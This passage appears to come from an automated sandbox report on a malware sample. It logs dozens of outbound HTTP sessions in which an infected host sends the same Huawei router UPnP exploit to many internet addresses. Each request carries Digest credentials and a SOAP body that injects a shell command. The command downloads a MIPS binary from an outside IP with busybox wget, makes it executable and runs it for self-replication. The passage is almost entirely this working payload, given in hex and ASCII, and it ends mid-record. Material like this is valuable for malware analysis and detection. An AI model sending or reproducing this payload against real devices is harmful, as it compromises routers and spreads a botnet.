                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1492192.168.2.1535544103.75.7.3337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.846963882 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1493192.168.2.1550114123.144.1.19837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.847105026 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1494192.168.2.1541130157.46.217.12137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.847120047 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1495192.168.2.153971241.204.103.14037215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.847296000 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1496192.168.2.1538998129.1.231.1537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.847369909 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1497192.168.2.1536996157.214.196.6637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.849709034 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1498192.168.2.1557548175.24.128.11537215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.857935905 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1499192.168.2.153731241.33.29.23937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.858047009 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1500192.168.2.155678041.237.54.21637215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.878778934 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1501192.168.2.1544302155.203.145.4137215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:06.878799915 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 